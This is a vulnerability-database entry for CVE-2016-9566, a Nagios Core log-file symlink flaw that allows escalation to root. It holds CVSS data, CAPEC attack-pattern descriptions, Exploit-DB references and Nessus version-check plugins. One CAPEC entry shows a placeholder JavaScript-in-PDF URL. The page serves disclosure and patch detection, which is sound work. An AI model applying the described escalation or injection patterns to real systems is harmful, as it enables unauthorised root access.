Vulnerabilities > CVE-2016-9566 - Permissions, Privileges, and Access Controls vulnerability in Nagios

CVSS 7.2 - HIGH
Attack vector: LOCAL
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: COMPLETE
Integrity impact: COMPLETE
Availability impact: COMPLETE
Tags: local, low complexity, nagios, CWE-264, nessus, exploit available

Summary

base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker either to directly access an executable file, for example through shell access, or, in a possible worst case, to upload a file and then execute it. Web servers, FTP servers, and message-oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in sync regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files: when the executable loads the resource (such as an image file or configuration file), the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. an application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated, mashing up resources from local and remote sources, the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing a buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028, where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading PDF files. In this case the attacker simply appends JavaScript to the end of a legitimate URL for a PDF (http://www.gnucitizen.org/blog/danger-danger-danger/): http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a PDF, but the attacker has modified the resource and loaded executable JavaScript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server; adding the role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when it is manipulated, the attacker gains full control.
  • Blue Boxing
    This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal, which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded telco infrastructure and so are vulnerable to blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different from standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
  • Restful Privilege Elevation
    REST uses standard HTTP (GET, PUT, DELETE) style permission methods, but these are not necessarily correlated with back-end programs. A strict interpretation of the HTTP GET method means that GET services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation follows these guidelines, an HTTP request can easily execute a delete or update on the server side. The attacker identifies an HTTP GET URL such as http://victimsite/updateOrder, which calls out to a program to update orders in a database or other resource. The URL is not idempotent, so the request can be submitted multiple times by the attacker; additionally, the attacker may be able to exploit a URL published as a GET method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
  • Target Programs with Elevated Privileges
    This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance, an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user tries to execute their code at the same level as a privileged system call.

Exploit-Db

  • description: Nagios Core < 4.2.4 - Privilege Escalation. CVE-2016-9566. Local exploit for Linux platform. Tags: Local
    file: exploits/linux/local/40921.sh
    id: EDB-ID:40921
    last seen: 2016-12-15
    modified: 2016-12-15
    platform: linux
    port:
    published: 2016-12-15
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/40921/
    title: Nagios Core < 4.2.4 - Privilege Escalation
    type: local
  • description: Nagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution. CVE-2016-9565. Remote exploit for Linux platform. Tags: Remote
    file: exploits/linux/remote/40920.py
    id: EDB-ID:40920
    last seen: 2016-12-15
    modified: 2016-12-15
    platform: linux
    port:
    published: 2016-12-15
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/40920/
    title: Nagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution
    type: remote

Nessus

  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DLA-1615.NASL
    description: Several issues were corrected in nagios3, a monitoring and management system for hosts, services and networks. CVE-2018-18245: Maximilian Boehner of usd AG found a cross-site scripting (XSS) vulnerability in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output. CVE-2016-9566: It was discovered that local users with access to an account in the nagios group are able to gain root privileges via a symlink attack on the debug log file. CVE-2014-1878: An issue was corrected that allowed remote attackers to cause a stack-based buffer overflow and subsequently a denial of service (segmentation fault) via a long message to cmd.cgi. CVE-2013-7205 | CVE-2013-7108: A flaw was corrected in Nagios that could be exploited to cause a denial of service. This vulnerability is induced due to an off-by-one error within the process_cgivars() function, which can be exploited to cause an out-of-bounds read by sending a specially crafted key value to the Nagios web UI. For Debian 8
    last seen: 2020-03-26
    modified: 2018-12-27
    plugin id: 119875
    published: 2018-12-27
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/119875
    title: Debian DLA-1615-1 : nagios3 security update
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Debian Security Advisory DLA-1615-1. The text
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(119875);
      script_version("1.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/25");
    
      script_cve_id("CVE-2013-7108", "CVE-2013-7205", "CVE-2014-1878", "CVE-2016-9566", "CVE-2018-18245");
      script_bugtraq_id(64363, 64489, 65605);
    
      script_name(english:"Debian DLA-1615-1 : nagios3 security update");
      script_summary(english:"Checks dpkg output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several issues were corrected in nagios3, a monitoring and management
    system for hosts, services and networks.
    
    CVE-2018-18245
    
    Maximilian Boehner of usd AG found a cross-site scripting (XSS)
    vulnerability in Nagios Core. This vulnerability allows attackers to
    place malicious JavaScript code into the web frontend through
    manipulation of plugin output. In order to do this the attacker needs
    to be able to manipulate the output returned by nagios checks, e.g. by
    replacing a plugin on one of the monitored endpoints. Execution of the
    payload then requires that an authenticated user creates an alert
    summary report which contains the corresponding output.
    
    CVE-2016-9566
    
    It was discovered that local users with access to an account in the
    nagios group are able to gain root privileges via a symlink attack on
    the debug log file.
    
    CVE-2014-1878
    
    An issue was corrected that allowed remote attackers to cause a
    stack-based buffer overflow and subsequently a denial of service
    (segmentation fault) via a long message to cmd.cgi.
    
    CVE-2013-7205 | CVE-2013-7108
    
    A flaw was corrected in Nagios that could be exploited to cause a
    denial of service. This vulnerability is induced due to an off-by-one
    error within the process_cgivars() function, which can be exploited to
    cause an out-of-bounds read by sending a specially crafted key value
    to the Nagios web UI.
    
    For Debian 8 'Jessie', these problems have been fixed in version
    3.5.1.dfsg-2+deb8u1.
    
    We recommend that you upgrade your nagios3 packages.
    
    NOTE: Tenable Network Security has extracted the preceding description
    block directly from the DLA security advisory. Tenable has attempted
    to automatically clean and format it as much as possible without
    introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://lists.debian.org/debian-lts-announce/2018/12/msg00014.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/nagios3"
      );
      script_set_attribute(attribute:"solution", value:"Upgrade the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-cgi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-core");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-dbg");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-doc");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/01/15");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/12/24");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/27");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"nagios3", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-cgi", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-common", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-core", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-dbg", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-doc", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL family: SuSE Local Security Checks
    NASL id: OPENSUSE-2017-100.NASL
    description: This update for icinga includes various upstream fixes and the following security fixes: - icinga was updated to version 1.14.0 - the classic-UI was vulnerable to a cross site scripting attack (CVE-2015-8010, boo#952777) - A user with nagios privileges could have gained root privileges by placing a symbolic link at the logfile location (CVE-2016-9566, boo#1014637)
    last seen: 2020-06-05
    modified: 2017-01-17
    plugin id: 96545
    published: 2017-01-17
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/96545
    title: openSUSE Security Update : icinga (openSUSE-2017-100)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update openSUSE-2017-100.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(96545);
      script_version("3.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2015-8010", "CVE-2016-9566");
    
      script_name(english:"openSUSE Security Update : icinga (openSUSE-2017-100)");
      script_summary(english:"Check for the openSUSE-2017-100 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "This update for icinga includes various upstream fixes and the
    following security security fixes :
    
      - icinga was updated to version 1.14.0
    
      - the classic-UI was vulnerable to a cross site scripting
        attack (CVE-2015-8010, boo#952777)
    
      - A user with nagios privileges could have gained root
        privileges by placing a symbolic link at the logfile
        location (CVE-2016-9566, boo#1014637)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1014637"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.opensuse.org/show_bug.cgi?id=952777"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected icinga packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-debugsource");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-oracle");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-pgsql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-plugins-downtimes");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-plugins-eventhandlers");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www-config");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:monitoring-tools");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:monitoring-tools-debuginfo");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/17");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    if (release !~ "^(SUSE42\.1|SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1 / 42.2", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    flag = 0;
    
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-debugsource-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-devel-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-mysql-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-oracle-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-pgsql-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-plugins-downtimes-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-plugins-eventhandlers-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-config-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"monitoring-tools-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"monitoring-tools-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-debuginfo-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-debugsource-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-devel-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-debuginfo-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-mysql-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-oracle-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-pgsql-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-plugins-downtimes-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-plugins-eventhandlers-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-config-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-debuginfo-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"monitoring-tools-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"monitoring-tools-debuginfo-1.14.0-4.1") ) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "icinga / icinga-debuginfo / icinga-debugsource / icinga-devel / etc");
    }
    
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2017-0259.NASL
    description: An update for nagios is now available for Red Hat Gluster Storage 3.1 for RHEL 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Nagios is a program that monitors hosts and services on your network, and has the ability to send email or page alerts when a problem arises or is resolved. Security Fix(es) : * It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system. (CVE-2016-9565) * A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 97061
    published: 2017-02-08
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/97061
    title: RHEL 6 : nagios (RHSA-2017:0259)
  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DLA-751.NASL
    description: Nagios was found to be vulnerable to two security issues that, when combined, lead to a remote root code execution vulnerability. Fortunately, the hardened permissions of the Debian package limit the effect of those to information disclosure, but privilege escalation to root is still possible locally. CVE-2016-9565: Improper sanitization of RSS feed input enables unauthenticated remote read and write of arbitrary files which may lead to remote code execution if the web root is writable. CVE-2016-9566: Unsafe logfile handling allows unprivileged users to escalate their privileges to root. In wheezy, this is possible only through the debug logfile which is disabled by default. For Debian 7
    last seen: 2020-03-17
    modified: 2016-12-20
    plugin id: 96012
    published: 2016-12-20
    reporter: This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/96012
    title: Debian DLA-751-1 : nagios3 security update
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-3253-2.NASL
    description: USN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files from being displayed in the web interface. This update fixes the problem. We apologize for the inconvenience. It was discovered that Nagios incorrectly handled certain long strings. A remote authenticated attacker could use this issue to cause Nagios to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2013-7108, CVE-2013-7205) It was discovered that Nagios incorrectly handled certain long messages to cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to crash, resulting in a denial of service. (CVE-2014-1878) Dawid Golunski discovered that Nagios incorrectly handled symlinks when accessing log files. A local attacker could possibly use this issue to elevate privileges. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2016-9566). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 100677
    published: 2017-06-08
    reporter: Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/100677
    title: Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : nagios3 regression (USN-3253-2)
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2017-0258.NASL
    description: An update for nagios is now available for Red Hat Gluster Storage 3.1 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Nagios is a program that monitors hosts and services on your network, and has the ability to send email or page alerts when a problem arises or is resolved. Security Fix(es) : * It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system. (CVE-2016-9565) * A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 97060
    published: 2017-02-08
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/97060
    title: RHEL 7 : nagios (RHSA-2017:0258)
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-201702-26.NASL
    description: The remote host is affected by the vulnerability described in GLSA-201702-26 (Nagios: Multiple vulnerabilities). Multiple vulnerabilities have been discovered in Nagios. Please review the CVE identifiers referenced below for details. Impact: A local attacker, who either is already Nagios's system user or belongs to Nagios's group, could potentially escalate privileges. In addition, a remote attacker could read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. Workaround: There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 97269
    published: 2017-02-21
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/97269
    title: GLSA-201702-26 : Nagios: Multiple vulnerabilities
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-D270E932A3.NASL
    description: Update to close CVE. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2018-01-15
    plugin id: 105984
    published: 2018-01-15
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/105984
    title: Fedora 27 : nagios (2017-d270e932a3)
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-201612-51.NASL
    description: The remote host is affected by the vulnerability described in GLSA-201612-51 (Icinga: Privilege escalation). The Icinga daemon was found to perform unsafe operations when handling the log file. Impact: A local attacker, who either is already Icinga's system user or belongs to Icinga's group, could potentially escalate privileges. Workaround: There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 96226
    published: 2017-01-03
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/96226
    title: GLSA-201612-51 : Icinga: Privilege escalation
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201710-20.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201710-20 (Nagios: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Nagios. Please review the referenced CVE identifiers for details. Impact : A remote attacker could possibly escalate privileges to root, thus allowing the execution of arbitrary code, by leveraging CVE-2016-9565. Additionally, a local attacker could cause a Denial of Service condition against arbitrary processes due to the improper dropping of privileges. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id103913
    published2017-10-18
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103913
    titleGLSA-201710-20 : Nagios: Multiple vulnerabilities
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3253-1.NASL
    descriptionIt was discovered that Nagios incorrectly handled certain long strings. A remote authenticated attacker could use this issue to cause Nagios to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2013-7108, CVE-2013-7205) It was discovered that Nagios incorrectly handled certain long messages to cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to crash, resulting in a denial of service. (CVE-2014-1878) Dawid Golunski discovered that Nagios incorrectly handled symlinks when accessing log files. A local attacker could possibly use this issue to elevate privileges. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2016-9566). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99182
    published2017-04-04
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99182
    titleUbuntu 14.04 LTS / 16.04 LTS / 16.10 : nagios3 vulnerabilities (USN-3253-1)
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2017-899.NASL
    descriptionMultiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, and Icinga before 1.8.5, 1.9 before 1.9.4, and 1.10 before 1.10.2 allow remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list to the process_cgivars function in (1) avail.c, (2) cmd.c, (3) config.c, (4) extinfo.c, (5) histogram.c, (6) notifications.c, (7) outages.c, (8) status.c, (9) statusmap.c, (10) summary.c, and (11) trends.c in cgi/, which triggers a heap-based buffer over-read. Stack-based buffer overflow in the cmd_submitf function in cgi/cmd.c in Nagios Core, possibly 4.0.3rc1 and earlier, and Icinga before 1.8.6, 1.9 before 1.9.5, and 1.10 before 1.10.3 allows remote attackers to cause a denial of service (segmentation fault) via a long message to cmd.cgi. Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers. A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the
    last seen2020-06-01
    modified2020-06-02
    plugin id103651
    published2017-10-04
